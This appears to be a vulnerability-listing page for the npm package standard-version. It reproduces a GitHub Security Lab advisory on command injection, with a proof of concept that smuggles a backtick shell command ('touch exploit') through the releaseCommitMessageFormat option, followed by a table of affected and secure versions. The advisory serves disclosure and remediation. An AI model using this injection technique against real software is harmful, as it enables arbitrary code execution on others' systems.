NodeJS/standard-version/4.0.0-1


replacement for `npm version` with automatic CHANGELOG generation

https://www.npmjs.com/package/standard-version
ISC

1 Security Vulnerabilities

Command Injection in standard-version

Published date: 2020-07-13T21:34:59Z
GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111

The GitHub Security Lab team has identified a potential security vulnerability in standard-version.

Summary

The standardVersion function has a command injection vulnerability. Clients of the standard-version library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.

Product

Standard Version

Tested Version

Commit 2f04ac8

Details

Issue 1: Command injection in standardVersion

The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:

npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"

Now create a file named test.js with the following contents:

var fs = require("fs");
// setting up a bit of environment: a minimal package.json for standardVersion to bump
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');

const standardVersion = require('standard-version')

standardVersion({
  noVerify: true,
  infile: 'foo.txt',
  // the format string ends up inside a shell command, so the backticks are executed
  releaseCommitMessageFormat: "bla `touch exploit`"
})

and run it:

node test.js

Notice that a file named exploit has been created.

This vulnerability is similar to command injection vulnerabilities that have been found in other JavaScript libraries. Here are some examples: CVE-2020-7646, CVE-2020-7614, CVE-2020-7597, CVE-2019-10778, CVE-2019-10776, CVE-2018-16462, CVE-2018-16461, CVE-2018-16460, CVE-2018-13797, CVE-2018-3786, CVE-2018-3772, CVE-2018-3746, CVE-2017-16100, CVE-2017-16042.

We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version project here.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Remediation

We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile instead of child_process.exec.

Credit

This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-111 in any communication regarding this issue.

Disclosure Policy

This report is subject to our coordinated disclosure policy.

Affected versions: 1.1.0, 2.1.1, 2.1.2, 2.2.0, 2.2.1, 2.3.0, 2.3.1, 2.4.0, 3.0.0, 4.0.0-0, 4.0.0-1, 4.0.0, 4.1.0-candidate.0, 4.1.0-candidate.1, 4.1.0-candidate.2, 4.1.0, 4.2.0, 4.3.0-candidate.0, 4.3.0-candidate.1, 4.3.0, 4.4.0, 5.0.0-candidate.0, 5.0.0, 5.0.1, 5.0.2, 6.0.0-beta.0, 6.0.0, 6.0.1, 7.0.0, 7.0.1, 7.1.0, 8.0.0
Secure versions: 8.0.1, 8.0.2, 9.0.0, 9.1.0, 9.1.1, 9.2.0, 9.3.0, 9.3.1, 9.3.2, 9.5.0
Recommendation: Update to version 9.5.0.

42 Other Versions

Version License Known-vulnerabilities Released Age
9.5.0 ISC 2022-05-15 - 13:46 almost 2 years
9.3.2 ISC 2021-10-17 - 20:48 over 2 years
9.3.1 ISC 2021-07-14 - 19:09 almost 3 years
9.3.0 ISC 2021-05-04 - 16:37 almost 3 years
9.2.0 ISC 2021-04-06 - 17:24 about 3 years
9.1.1 ISC 2021-02-17 - 21:47 about 3 years
9.1.0 ISC 2020-12-30 - 02:03 over 3 years
9.0.0 ISC 2020-08-15 - 00:27 over 3 years
8.0.2 ISC 2020-07-14 - 01:37 almost 4 years
8.0.1 ISC 2020-07-12 - 08:12 almost 4 years
8.0.0 ISC 1 2020-05-06 - 20:03 almost 4 years
7.1.0 ISC 1 2019-12-08 - 23:22 over 4 years
7.0.1 ISC 1 2019-11-07 - 22:04 over 4 years
7.0.0 ISC 1 2019-07-30 - 05:12 over 4 years
6.0.1 ISC 1 2019-05-05 - 21:55 almost 5 years
6.0.0 ISC 1 2019-05-05 - 21:26 almost 5 years
6.0.0-beta.0 ISC 1 2019-05-05 - 21:25 almost 5 years
5.0.2 ISC 1 2019-03-16 - 19:03 about 5 years
5.0.1 ISC 1 2019-02-28 - 04:11 about 5 years
5.0.0 ISC 1 2019-02-14 - 23:48 about 5 years
5.0.0-candidate.0 ISC 1 2018-11-02 - 06:55 over 5 years
4.4.0 ISC 1 2018-05-21 - 20:28 almost 6 years
4.3.0 ISC 1 2018-01-03 - 06:50 over 6 years
4.3.0-candidate.1 ISC 1 2018-01-03 - 05:27 over 6 years
4.3.0-candidate.0 ISC 1 2017-12-20 - 06:15 over 6 years
4.2.0 ISC 1 2017-06-12 - 22:34 almost 7 years
4.1.0 ISC 1 2017-06-06 - 05:14 almost 7 years
4.1.0-candidate.2 ISC 1 2017-06-06 - 00:12 almost 7 years
4.1.0-candidate.1 ISC 1 2017-06-05 - 23:31 almost 7 years
4.1.0-candidate.0 ISC 1 2017-06-05 - 00:05 almost 7 years
4.0.0 ISC 1 2016-12-02 - 11:34 over 7 years
4.0.0-1 ISC 1 2016-11-27 - 01:03 over 7 years
4.0.0-0 ISC 1 2016-11-26 - 22:26 over 7 years
3.0.0 ISC 1 2016-10-06 - 18:17 over 7 years
2.4.0 ISC 1 2016-07-13 - 17:36 almost 8 years
2.3.1 ISC 1 2016-06-15 - 23:04 almost 8 years
2.3.0 ISC 1 2016-06-02 - 17:24 almost 8 years
2.2.1 ISC 1 2016-05-02 - 04:26 almost 8 years
2.2.0 ISC 1 2016-05-02 - 00:01 almost 8 years
2.1.2 ISC 1 2016-04-11 - 02:20 about 8 years
2.1.1 ISC 1 2016-04-10 - 00:10 about 8 years
1.1.0 ISC 1 2016-04-08 - 23:29 about 8 years